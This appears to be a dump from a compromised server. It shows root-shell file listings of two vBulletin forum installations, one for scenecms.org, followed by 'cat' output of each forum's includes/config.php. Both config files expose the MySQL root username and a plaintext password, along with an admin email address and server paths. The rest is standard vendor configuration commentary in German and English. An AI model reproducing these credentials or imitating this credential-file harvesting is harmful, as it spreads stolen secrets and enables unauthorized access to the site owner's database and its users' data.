-rw-r--r--  1 root root   19565 Apr  5  2010 LICENSE
drwxr-xr-x  3 root root    4096 Apr  5  2010 admincp
-rw-r--r--  1 root root   23760 Apr  5  2010 ajax.php
-rw-r--r--  1 root root   75427 Apr  5  2010 album.php
-rw-r--r--  1 root root   17051 Apr  5  2010 announcement.php
drwxr-xr-x  2 root root    4096 Apr  5  2010 archive
-rw-r--r--  1 root root   18225 Apr  5  2010 attachment.php
-rw-r--r--  1 root root   75242 Apr  5  2010 calendar.php
-rw-r--r--  1 root root   58135 Apr  5  2010 checksums.md5
-rw-r--r--  1 root root      43 Apr  5  2010 clear.gif
drwxr-xr-x  4 root root    4096 Apr  5  2010 clientscript
-rw-r--r--  1 root root   15277 Apr  5  2010 converse.php
drwxr-xr-x  7 root root    4096 Apr  5  2010 cpstyles
-rw-r--r--  1 root root    3233 Apr  5  2010 cron.php
drwxr-xr-x  3 root root    4096 Apr  5  2010 customavatars
drwxr-xr-x  3 root root    4096 Apr  5  2010 customgroupicons
drwxr-xr-x  2 root root    4096 Apr  5  2010 customprofilepics
-rw-r--r--  1 root root    3485 Apr  5  2010 dgt_released.nfo
-rw-r--r--  1 root root   47671 Apr  5  2010 editpost.php
-rw-r--r--  1 root root   29410 Apr  5  2010 external.php
-rw-r--r--  1 root root    9702 Apr  5  2010 faq.php
-rw-r--r--  1 root root   10134 Apr  5  2010 favicon.ico
-rw-r--r--  1 root root     521 Apr  5  2010 file_id.diz
-rw-r--r--  1 root root   35900 Apr  5  2010 forumdisplay.php
-rw-r--r--  1 root root   39747 Apr  5  2010 global.php
-rw-r--r--  1 root root  138104 Apr  5  2010 group.php
-rw-r--r--  1 root root   24835 Apr  5  2010 group_inlinemod.php
-rw-r--r--  1 root root   10747 Apr  5  2010 groupsubscription.php
-rw-r--r--  1 root root    8963 Apr  5  2010 image.php
drwxr-xr-x 16 root root    4096 Apr  5  2010 images
drwxr-xr-x  6 root root   12288 May 22  2010 includes
-rw-r--r--  1 root root   19508 Apr  5  2010 index.php
-rw-r--r--  1 root root   43844 Apr  5  2010 infraction.php
-rw-r--r--  1 root root  182837 Apr  5  2010 inlinemod.php
drwxr-xr-x  2 root root    4096 May 22  2010 install
-rw-r--r--  1 root root   10258 Apr  5  2010 joinrequests.php
-rw-r--r--  1 root root   10138 Apr  5  2010 login.php
-rw-r--r--  1 root root   16980 Apr  5  2010 member.php
-rw-r--r--  1 root root   15847 Apr  5  2010 member_inlinemod.php
-rw-r--r--  1 root root   35817 Apr  5  2010 memberlist.php
-rw-r--r--  1 root root   23782 Apr  5  2010 misc.php
drwxr-xr-x  2 root root    4096 Apr  5  2010 modcp
-rw-r--r--  1 root root   63240 Apr  5  2010 moderation.php
-rw-r--r--  1 root root    6672 Apr  5  2010 moderator.php
-rw-r--r--  1 root root   18392 Apr  5  2010 newattachment.php
-rw-r--r--  1 root root   37017 Apr  5  2010 newreply.php
-rw-r--r--  1 root root   18827 Apr  5  2010 newthread.php
-rw-r--r--  1 root root   19520 Apr  5  2010 online.php
-rw-r--r--  1 root root    7612 Apr  5  2010 payment_gateway.php
-rw-r--r--  1 root root   11826 Apr  5  2010 payments.php
-rw-r--r--  1 root root    7805 Apr  5  2010 picture.php
-rw-r--r--  1 root root   21956 Apr  5  2010 picture_inlinemod.php
-rw-r--r--  1 root root   25223 Apr  5  2010 picturecomment.php
-rw-r--r--  1 root root   27328 Apr  5  2010 poll.php
-rw-r--r--  1 root root    9428 Apr  5  2010 posthistory.php
-rw-r--r--  1 root root   74284 Apr  5  2010 postings.php
-rw-r--r--  1 root root    6509 Apr  5  2010 printthread.php
-rw-r--r--  1 root root   70656 Apr  5  2010 private.php
-rw-r--r--  1 root root  152244 Apr  5  2010 profile.php
-rw-r--r--  1 root root   39667 Apr  5  2010 register.php
-rw-r--r--  1 root root    5603 Apr  5  2010 report.php
-rw-r--r--  1 root root   13635 Apr  5  2010 reputation.php
-rw-r--r--  1 root root  124633 Apr  5  2010 search.php
-rw-r--r--  1 root root   20862 Apr  5  2010 sendmessage.php
-rw-r--r--  1 root root    9925 Apr  5  2010 showgroups.php
-rw-r--r--  1 root root   12304 Apr  5  2010 showpost.php
-rw-r--r--  1 root root   75611 Apr  5  2010 showthread.php
drwxr-xr-x  2 root root    4096 Apr  5  2010 signaturepics
-rw-r--r--  1 root root   32792 Apr  5  2010 subscription.php
-rw-r--r--  1 root root   13281 Apr  5  2010 tags.php
-rw-r--r--  1 root root    8608 Apr  5  2010 threadrate.php
-rw-r--r--  1 root root   12331 Apr  5  2010 threadtag.php
drwxr-xr-x  2 root root    4096 May 22  2010 upload
-rw-r--r--  1 root root   34424 Apr  5  2010 usercp.php
-rw-r--r--  1 root root   19011 Apr  5  2010 usernote.php
-rw-r--r--  1 root root   29490 Apr  5  2010 validator.php
-rw-r--r--  1 root root 3417514 May 22  2010 vb38.rar
-rw-r--r--  1 root root   27293 Apr  5  2010 visitormessage.php
drwxr-xr-x  2 root root    4096 May 22  2010 web

# cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.5
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ?2000-2010 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** HINWEIS ZU DEN VARIABLEN IN DIESER DATEI ******* |
+---------------------------------------------------------+
| Falls bei dem Verbindungsaufbau zu Ihrer MySQL-Daten-   |
| bank Fehler auftreten, muessen Sie Ihren Provider um    |
| Hilfe bitten, da wir Ihnen die richtigen Daten fuer die |
| Variablen in dieser Datei nicht nennen koennen.         |
\*-------------------------------------------------------*/

	//	****** DATENBANK: TYP ******
	//	Tragen Sie hier den Typ Ihres Datenbankservers ein, auf dem sich die vBulletin-Datenbank
	//	befinden wird bzw. befindet. Gueltige Optionen sind mysql und mysqli.
	//	Versuchen Sie es mit mysqli, wenn Sie PHP 5 und MySQL 4.1+ verwenden.
	//	Wenn Sie eine Master-Slave Datenbankkonfiguration betreiben moechten, tragen Sie 'mysql_slave' bzw. 'mysqli_slave' ein.
$config['Database']['dbtype'] = 'mysql';

	//	****** DATENBANK: NAME DER DATENBANK ******
	//	Tragen Sie hier den Namen der Datenbank ein, mit der vBulletin arbeiten soll.
	//	Diesen Datenbanknamen erhalten Sie normalerweise von Ihrem Provider.
$config['Database']['dbname'] = 'cccteam';

	//	****** TABELLEN-PRAEFIX ******
	//	Praefix, das den Tabellennamen in der Datenbank vorangestellt wird.
	//	Zum Beispiel: $config['Database']['tableprefix'] = 'vb3_';
	//	Hinweis: Praefixe fuer die Tabellennamen koennen Sie mit der Datei
	//	install/tableprefix.php hinzufuegen, aendern oder entfernen.
$config['Database']['tableprefix'] = '';

	//	****** TECHNISCHE E-MAIL-ADRESSE ******
	//	Treten Fehler bei der Datenbank auf, wird eine E-Mail mit einer Fehlerbeschreibung
	//	an diese Adresse geschickt.
	//	Falls Sie hier keine E-Mail-Adresse eintragen, werden bei Datenbankfehlern keine
	//	E-Mails verschickt.
$config['Database']['technicalemail'] = 'dbmeister@beispiel.xy';

	//	****** LEEREN SQL-MODUS ERZWINGEN ******
	//	In neueren Versionen von MySQL (4.1+) gibt es einige Neuerungen, die nicht mit vBulletin
	//	kompatibel sind. Wenn Sie diese Einstellung auf "true" setzen, werden diese Neuerungen
	//	deaktiviert. Sie muessen diese Einstellung nur aendern, wenn vBulletin Sie dazu auffordert.
$config['Database']['force_sql_mode'] = false;



	//	****** MASTER-DATENBANK: SERVERNAME UND PORT ******
	//	Tragen Sie hier den Hostnamen oder die IP-Adresse und den Port Ihres Datenbankservers ein.
	//	Wenn Sie sich nicht sicher sind, was Sie hier eintragen muessen, versuchen Sie es zunaechst
	//	mit dem Standardwerten.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

	//	****** MASTER-DATENBANK: BENUTZERNAME & KENNWORT ******
	//	Tragen Sie hier den Benutzernamen und das Kennwort ein, die Sie fuer den Zugriff
	//	auf den MySQL-Server benoetigen.
	//	Den Benutzernamen und das Kennwort erhalten Sie von Ihrem Provider.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = 'QkZorIZZC5e';

	//	****** MASTER-DATENBANK: PERSISTENTE VERBINDUNGEN ******
	//	Hier koennen Sie festlegen, ob persistente Verbindungen zu MySQL genutzt werden sollen.
	//	Der Performance-Unterschied ist im Normalfall vernachlaessigbar, ausser vielleicht
	//	bei extrem grossen Foren.
	//	Wenn Sie nicht sicher sind, was Sie hier angeben sollen, lassen Sie die Einstellung
	//	auf aus.
	//	0 = aus; 1 = an
$config['MasterServer']['usepconnect'] = 0;



	//	****** SLAVE-DATENBANK: KONFIGURATION ******
	//	Wenn Sie zwei Datenbankserver verwenden, koennen Sie hier die Daten fuer den Slave-Server
	//	festlegen.
	//	Wenn Sie sich nicht 100% sicher sind, ob Sie hier etwas eintragen muessen, veraendern Sie die
	//	Standardeinstellungen nicht.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



	//	****** PFADE ZUM ADMINISTRATOR- UND MODERATOR-KONTROLLZENTRUM ******
	//	Hier koennen Sie fuer die Verzeichnisse, in denen sich die Dateien fuer das
	//	Administrator- und Moderator-Kontrollzentrum befinden, alternative Namen an-
	//	geben. Vielleicht moechten Sie dies aus Sicherheitsgruenden tun.
	//	Bitte beachten Sie, dass, wenn Sie die Namen hier aendern, Sie auch noch die
	//	Namen der Verzeichnisse auf dem Server aendern muessen.
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';

	//	****** COOKIE-PRAEFIX ******
	//	Praefix, das in allen vBulletin-Cookies enthalten ist.
	//	Halten Sie es kurz und verwenden Sie nur Zahlen und Buchstaben, d.h. 1-9 und a-Z
$config['Misc']['cookieprefix'] = 'bb';

	//	****** VOLLSTAENDIGER PFAD ZUM VERZEICHNIS DES FORUMS ******
	//	Bei einigen Servern kann es noetig sein, den vollstaendigen Pfad zum Verzeichnis des Forums
	//	anzugeben, damit vBulletin ohne Probleme funktioniert. Sie muessen diese Einstellung nur
	//	aendern, wenn vBulletin Sie dazu auffordert.
	//	Hinweis: Verwenden Sie keinen abschliessenden Schraegstrich ('/') nach dem Verzeichnisnamen.
	//	Beispiel fuer Unix:
	//	  $config['Misc']['forumpath'] = '/home/users/public_html/forums';
	//	Beispiel fuer Win32:
	//	  $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';

	//	****** COOKIE SICHERHEITS HASH ******
	//	Diese Option erlaubt die Cookies zu verschluesseln.
	//	Benutzbar sind dabei jegliche Zahlen und Buchstaben, d.h. 1-9 und a-Z.
	//	Diese Angabe kann leer gelassen werden um den Standard zu benutzen.
	//	Hinweis: Bei Aenderung werden alle Benutzer ausgeloggt.
$config['Misc']['cookie_security_hash'] = '';


	//	****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG SEHEN DUERFEN ******
	//	Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum das
	//	Kontrollzentrum-Log ansehen.
	//	Die Benutzer werden hier durch ihre User-ID angegeben. Um die User-ID heraus-
	//	zufinden, sehen Sie sich den Benutzer im Administrator-Kontrollzentrum an.
	//	Falls Sie diese Datei fuer eine Neuinstallation aendern, lassen Sie den Standard-
	//	wert stehen, da der erste Benutzer (Administrator) die User-ID 1 erhaelt.
	//	Trennen Sie mehrere User-IDs mit einem Komma voneinander.
	//	Beispiel 1: $config['SpecialUsers']['canviewadminlog'] = '1';
	//	Beispiel 2: $config['SpecialUsers']['canviewadminlog'] = '1,5,9';
$config['SpecialUsers']['canviewadminlog'] = '1';

	//	****** BENUTZER, DIE DAS KONTROLLZENTRUM-LOG LOESCHEN DUERFEN ******
	//	Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum
	//	Eintraege aus dem Kontrollzentrum-Log loeschen.
	//	Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
$config['SpecialUsers']['canpruneadminlog'] = '1';

	//	****** BENUTZER, DIE QUERYS AUSFUEHREN DUERFEN ******
	//	Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum
	//	Querys (Datenbankabfragen) ausfuehren.
	//	Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
	//	Hinweis: Querys ausfuehren zu koennen, kann eine kritische Angelegenheit sein.
	//	Aus Sicherheitsgruenden sollten Sie in diese Liste keine User-IDs eintragen.
$config['SpecialUsers']['canrunqueries'] = '';

	//	****** UNLOESCHBARE / UNVERAENDERBARE BENUTZER ******
	//	Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum
	//	von anderen Benutzern nicht geloescht oder bearbeitet werden.
	//	Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
$config['SpecialUsers']['undeletableusers'] = '';

	//	****** SUPER-ADMINISTRATOREN ******
	//	Alle hier angegebenen Benutzer koennen im Administrator-Kontrollzentrum die
	//	Seite fuer die Administrator-Berechtigungen aufrufen und damit die Rechte
	//	anderer Administratoren bearbeiten.
	//	Trennen Sie mehrere User-IDs mit einem Komma voneinander (s.o.).
$config['SpecialUsers']['superadministrators'] = '1';

	// ****** DATASTORE-CACHE KONFIGURATION ******
	//	Hier koennen Sie die verschiedenen Methoden konfigurieren, die fuer den Cache
	//	der Datastore-Elemente verwendet werden.
	//	vB_Datastore_Filecache  - um die Cache-Datei /includes/datastore/datastore_cache.php zu verwenden (CHMOD 777 benoetigt)
	//	vB_Datastore_APC - um APC zu verwenden
	//	vB_Datastore_XCache - um XCache zu verwenden
	//	vB_Datastore_eAccelerator - um eAccelerator zu verwenden
	//	vB_Datastore_Memcached - um einen Memcache-Server zu verwenden (Konfiguration weiter unten)
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

	// ****** DATASTORE-PRAEFIX ******
	//	Wenn Sie einen PHP-Cache (APC, XCache, eAccelerator) verwenden und auf Ihrem
	//	Server mehr als ein Forum installiert ist, *kann* es sein, dass Sie hier
	//	ein Datastore-Praefix angeben muessen, damit die Foren nicht dieselbe
	//	Variable im Cache verwenden.
	//	Dies funktioniert aehnlich wie das Tabellen-Praefix fuer die Datenbank.
// $config['Datastore']['prefix'] = '';

	//	Bei einem Memcache-Server ist es auch notwendig, dass Sie den Hostnamen bzw.
	//	die IP-Adresse und den Port angeben, unter denen der Server erreichbar ist:
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// Erster Server
$i++;
$config['Misc']['memcacheserver'][$i]		= '127.0.0.1';
$config['Misc']['memcacheport'][$i]			= 11211;
$config['Misc']['memcachepersistent'][$i]	= true;
$config['Misc']['memcacheweight'][$i]		= 1;
$config['Misc']['memcachetimeout'][$i]		= 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/

// ********************************************************************************
// ****** Die folgenden Einstellungen werden nur in Spezialfaellen benoetigt ******
// ********************************************************************************

	//	****** MySQLI-EINSTELLUNGEN ******
	//	Wenn Sie MySQL 4.1+ verwenden, sollte MySQLi fuer die Verbindung zur Datenbank
	//	verwendet werden.
	//	Wenn Ihre Datenbank einen anderen Zeichensatz als 'latin1' verwendet, koennen Sie
	//	hier den Standard-Zeichensatz fuer die Verbindung angeben.
	//	Wenn Sie nicht denselben Zeichensatz angeben, den Ihre Datenbank verwendet, kann
	//	es zu Fehlermeldungen dieser Art kommen:
	//	'mysql error: Illegal mix of collations'
	//	Sie muessen diese Einstellung nur aendern, wenn Sie sicher wissen, dass dies noetig ist.
// $config['Mysqli']['charset'] = 'utf8';

	//	Zusaetzlich kann PHP angewiesen werden, die Verbindungs-Parameter aus der Datei
	//	auszulesen, die in 'ini_file' angegeben wurde. Bitte geben Sie den vollstaendigen
	//	Pfad zu dieser Datei an.
	//	Beispiel:
	//	$config['Mysqli']['ini_file'] = 'C:\Programme\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';

	//	Einstellungen fuer die Grafikverarbeitung
	//	Alle Grafiken, die groesser als die unten angegebenen Dimensionen sind, werden von
	//	vBulletin nicht verkleinert. Wenn auch groessere Grafiken verkleinert werden sollen,
	//	passen Sie diese Einstellungen an.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

	//	GZIP komplett deaktivieren: Dies ist noetig, wenn auf dem Server standardmaessig
	//	GZIP aktiv ist und diese Option auch im Administrator-Kontrollzentrum aktiviert wurde.
	//	Dadurch ist oft in vBulletin keine Anmeldung mehr moeglich.
	//	Moeglicherweise ist es noetig, die folgende Zeile in der Datei /includes/init.php oder
	//	/includes/class_core.php aufzunehmen, damit dieser Eintrag wirksam wird.
//define('NOZIP', 1);

	//	Plug-in-System komplett deaktivieren: Dies ist noetig, wenn durch
	//	fehlerhafte Plug-ins in vBulletin keine Anmeldung mehr moeglich ist.
//define('DISABLE_HOOKS', 1);

	//	Keine E-Mails verschicken. Diese Einstellung sollte fuer ein Test-Forum aktiviert werden.
//define('DISABLE_MAIL', true);

	//	Debug-Modus aktivieren: Nur fuer Entwickler gedacht.
//if (VB_AREA == 'AdminCP')
//{
//	$config['Misc']['debug'] = 1;
//}

/*======================================================================*\
|| ####################################################################
|| # CVS: $RCSfile$ - $Revision: 1035 $ 28757
|| ####################################################################
\*======================================================================*/

// Ja, es ist richtig, dass am Ende dieser Datei kein schliessendes PHP-Tag steht!
// Dadurch wird ein haeufig auftretender Fehler vermieden.

# cd /var/www/scenecms.org/ && ls -la
total 32
drwxrwxrwx 4 root root 4096 Oct  1 09:18 .
drwxr-xr-x 9 root root 4096 Dec 28 02:33 ..
drwxr-xr-x 3 root root 4096 Oct  1 09:18 ba
-rw-r--r-- 1 root root   35 Mar 15  2010 index.php
-rw-r--r-- 1 root root 9962 May 10  2010 oldDATA.tgz
drwxrwxrwx 3 root root 4096 Jul  8  2010 web

# cd web && ls -la
total 12
drwxrwxrwx  3 root root 4096 Jul  8  2010 .
drwxrwxrwx  4 root root 4096 Oct  1 09:18 ..
drwxr-xr-x 16 root root 4096 Oct  2 15:14 board

# cd board/ && ls -la
total 2272
drwxr-xr-x 16 root root   4096 Oct  2 15:14 .
drwxrwxrwx  3 root root   4096 Jul  8  2010 ..
-rw-r--r--  1 root root  17097 Apr 23  2010 LICENSE
drwxr-xr-x  3 root root   4096 Oct  2 15:31 admincp
-rw-r--r--  1 root root  38048 Apr 23  2010 ajax.php
-rw-r--r--  1 root root  75538 Apr 23  2010 album.php
-rw-r--r--  1 root root  19054 Apr 23  2010 announcement.php
drwxr-xr-x  2 root root   4096 Jul  8  2010 archive
-rw-r--r--  1 root root   8945 Apr 23  2010 asset.php
-rw-r--r--  1 root root  20246 Apr 23  2010 assetmanage.php
-rw-r--r--  1 root root  15723 Apr 23  2010 attachment.php
-rw-r--r--  1 root root   6119 Apr 23  2010 attachment_inlinemod.php
-rw-r--r--  1 root root   3462 Apr 23  2010 blog_attachment.php
-rw-r--r--  1 root root  96014 Apr 23  2010 calendar.php
-rw-r--r--  1 root root     43 Apr 23  2010 clear.gif
drwxr-xr-x  7 root root   4096 Jul  8  2010 clientscript
-rw-r--r--  1 root root  15283 Apr 23  2010 converse.php
drwxr-xr-x  7 root root   4096 Jul  8  2010 cpstyles
-rw-r--r--  1 root root   3244 Apr 23  2010 cron.php
-rw-r--r--  1 root root   4051 Apr 23  2010 css.php
drwxr-xr-x  3 root root   4096 Jul  8  2010 customavatars
drwxr-xr-x  3 root root   4096 Jul  8  2010 customgroupicons
drwxr-xr-x  2 root root   4096 Jul  8  2010 customprofilepics
-rw-r--r--  1 root root   1660 Apr 23  2010 editor.php
-rw-r--r--  1 root root  46327 Apr 23  2010 editpost.php
-rw-r--r--  1 root root   1336 Apr 23  2010 entry.php
-rw-r--r--  1 root root  29278 Apr 23  2010 external.php
-rw-r--r--  1 root root   9901 Apr 23  2010 faq.php
-rw-r--r--  1 root root  10134 Apr 23  2010 favicon.ico
-rw-r--r--  1 root root  22502 Apr 23  2010 forum.php
-rw-r--r--  1 root root  42428 Apr 23  2010 forumdisplay.php
-rw-r--r--  1 root root   2001 Apr 23  2010 global.php
-rw-r--r--  1 root root 155709 Apr 23  2010 group.php
-rw-r--r--  1 root root  26085 Apr 23  2010 group_inlinemod.php
-rw-r--r--  1 root root  11483 Apr 23  2010 groupsubscription.php
-rw-r--r--  1 root root   8974 Apr 23  2010 image.php
drwxr-xr-x 24 root root   4096 Oct  2 16:42 images
drwxr-xr-x  8 root root  12288 Oct  2 15:27 includes
-rw-r--r--  1 root root   2335 Apr 23  2010 index.php
-rw-r--r--  1 root root  46944 Apr 23  2010 infraction.php
-rw-r--r--  1 root root 186868 Apr 23  2010 inlinemod.php
drwxr-xr-x  3 root root   4096 Oct  2 15:09 install
-rw-r--r--  1 root root  11280 Apr 23  2010 joinrequests.php
-rw-r--r--  1 root root   1656 Apr 23  2010 list.php
-rw-r--r--  1 root root  10749 Apr 23  2010 login.php
-rw-r--r--  1 root root  18893 Apr 23  2010 member.php
-rw-r--r--  1 root root  16327 Apr 23  2010 member_inlinemod.php
-rw-r--r--  1 root root  40280 Apr 23  2010 memberlist.php
-rw-r--r--  1 root root  22247 Apr 23  2010 misc.php
drwxr-xr-x  2 root root   4096 Jul  8  2010 modcp
-rw-r--r--  1 root root  75687 Apr 23  2010 moderation.php
-rw-r--r--  1 root root   6714 Apr 23  2010 moderator.php
-rw-r--r--  1 root root  17286 Apr 23  2010 newattachment.php
-rw-r--r--  1 root root  38921 Apr 23  2010 newreply.php
-rw-r--r--  1 root root  19610 Apr 23  2010 newthread.php
-rw-r--r--  1 root root  21719 Apr 23  2010 online.php
drwxr-xr-x  5 root root   4096 Jul  8  2010 packages
-rw-r--r--  1 root root   8031 Apr 23  2010 payment_gateway.php
-rw-r--r--  1 root root  13196 Apr 23  2010 payments.php
-rw-r--r--  1 root root   3997 Apr 23  2010 picture.php
-rw-r--r--  1 root root  16600 Apr 23  2010 picture_inlinemod.php
-rw-r--r--  1 root root  26104 Apr 23  2010 picturecomment.php
-rw-r--r--  1 root root  29273 Apr 23  2010 poll.php
-rw-r--r--  1 root root  10349 Apr 23  2010 posthistory.php
-rw-r--r--  1 root root  76416 Apr 23  2010 postings.php
-rw-r--r--  1 root root   7022 Apr 23  2010 printthread.php
-rw-r--r--  1 root root  78993 Apr 23  2010 private.php
-rw-r--r--  1 root root 160820 Apr 23  2010 profile.php
-rw-r--r--  1 root root    296 Apr 23  2010 receiver.php
-rw-r--r--  1 root root  54170 Apr 23  2010 register.php
-rw-r--r--  1 root root   5742 Apr 23  2010 report.php
-rw-r--r--  1 root root  14700 Apr 23  2010 reputation.php
-rw-r--r--  1 root root  34065 Apr 23  2010 search.php
-rw-r--r--  1 root root  22645 Apr 23  2010 sendmessage.php
-rw-r--r--  1 root root  12420 Apr 23  2010 showgroups.php
-rw-r--r--  1 root root  12673 Apr 23  2010 showpost.php
-rw-r--r--  1 root root  79415 Apr 23  2010 showthread.php
drwxr-xr-x  2 root root   4096 Jul  8  2010 signaturepics
-rw-r--r--  1 root root  37650 Apr 23  2010 subscription.php
-rw-r--r--  1 root root   5334 Apr 23  2010 tags.php
-rw-r--r--  1 root root   8735 Apr 23  2010 threadrate.php
-rw-r--r--  1 root root  11081 Apr 23  2010 threadtag.php
-rw-r--r--  1 root root     61 Apr 23  2010 uploadprogress.gif
-rw-r--r--  1 root root  39049 Apr 23  2010 usercp.php
-rw-r--r--  1 root root  20969 Apr 23  2010 usernote.php
drwxr-xr-x 12 root root   4096 Jul  8  2010 vb
-rw-r--r--  1 root root  27814 Apr 23  2010 visitormessage.php
-rw-r--r--  1 root root   1660 Apr 23  2010 widget.php
-rw-r--r--  1 root root   3656 Apr 23  2010 xmlsitemap.php

# cat includes/config.php 
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 4.0.3 Patch Level 1
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ?2000-2010 vBulletin Solutions Inc. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/

	//	****** DATABASE TYPE ******
	//	This is the type of the database server on which your vBulletin database will be located.
	//	Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
	// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

	//	****** DATABASE NAME ******
	//	This is the name of the database where your vBulletin will be located.
	//	This must be created by your webhost.
$config['Database']['dbname'] = 'forum';

	//	****** TABLE PREFIX ******
	//	Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';

	//	****** TECHNICAL EMAIL ADDRESS ******
	//	If any database errors occur, they will be emailed to the address specified here.
	//	Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'admin@scenecms.org';

	//	****** FORCE EMPTY SQL MODE ******
	// New versions of MySQL (4.1+) have introduced some behaviors that are
	// incompatible with vBulletin. Setting this value to "true" disables those
	// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



	//	****** MASTER DATABASE SERVER NAME AND PORT ******
	//	This is the hostname or IP address and port of the database server.
	//	If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

	//	****** MASTER DATABASE USERNAME & PASSWORD ******
	//	This is the username and password you use to access MySQL.
	//	These must be obtained through your webhost.
$config['MasterServer']['username'] = 'root';
$config['MasterServer']['password'] = 'QkZorIZZC5e';

	//	****** MASTER DATABASE PERSISTENT CONNECTIONS ******
	//	This option allows you to turn persistent connections to MySQL on or off.
	//	The difference in performance is negligible for all but the largest boards.
	//	If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



	//	****** SLAVE DATABASE CONFIGURATION ******
	//	If you have multiple database backends, this is the information for your slave
	//	server. If you are not 100% sure you need to fill in this information,
	//	do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



	//	****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
	//	This setting allows you to change the name of the folders that the admin and
	//	moderator control panels reside in. You may wish to do this for security purposes.
	//	Please note that if you change the name of the directory here, you will still need
	//	to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'admincp';
$config['Misc']['modcpdir'] = 'modcp';

	//	Prefix that all vBulletin cookies will have
	//	Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

	//	******** FULL PATH TO FORUMS DIRECTORY ******
	//	On a few systems it may be necessary to input the full path to your forums directory
	//	for vBulletin to function normally. You can ignore this setting unless vBulletin
	//	tells you to fill this in. Do not include a trailing slash!
	//	Example Unix:
	//	  $config['Misc']['forumpath'] = '/home/users/public_html/forums';
	//	Example Win32:
	//	  $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '/var/www/scenecms.org/web/board';



	//	****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
	//	The users specified here will be allowed to view the admin log in the control panel.
	//	Users must be specified by *ID number* here. To obtain a user's ID number,
	//	view their profile via the control panel. If this is a new installation, leave
	//	the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';

	//	****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
	//	The users specified here will be allowed to remove ("prune") entries from the admin
	//	log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';

	//	****** USERS WITH QUERY RUNNING PERMISSIONS ******
	//	The users specified here will be allowed to run queries from the control panel.
	//	See the above entries for more information on the format.
	//	Please note that the ability to run queries is quite powerful. You may wish
	//	to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

	//	****** UNDELETABLE / UNALTERABLE USERS ******
	//	The users specified here will not be deletable or alterable from the control panel by any users.
	//	To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '';

	//	****** SUPER ADMINISTRATORS ******
	//	The users specified below will have permission to access the administrator permissions
	//	page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1';

	// ****** DATASTORE CACHE CONFIGURATION *****
	// Here you can configure different methods for caching datastore items.
	// vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
	// vB_Datastore_APC - to use APC
	// vB_Datastore_XCache - to use XCache
	// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

	// ******** DATASTORE PREFIX ******
	// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
	// than one set of forums installed on your host, you *may* need to use a prefix
	// so that they do not try to use the same variable within the cache.
	// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

	// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
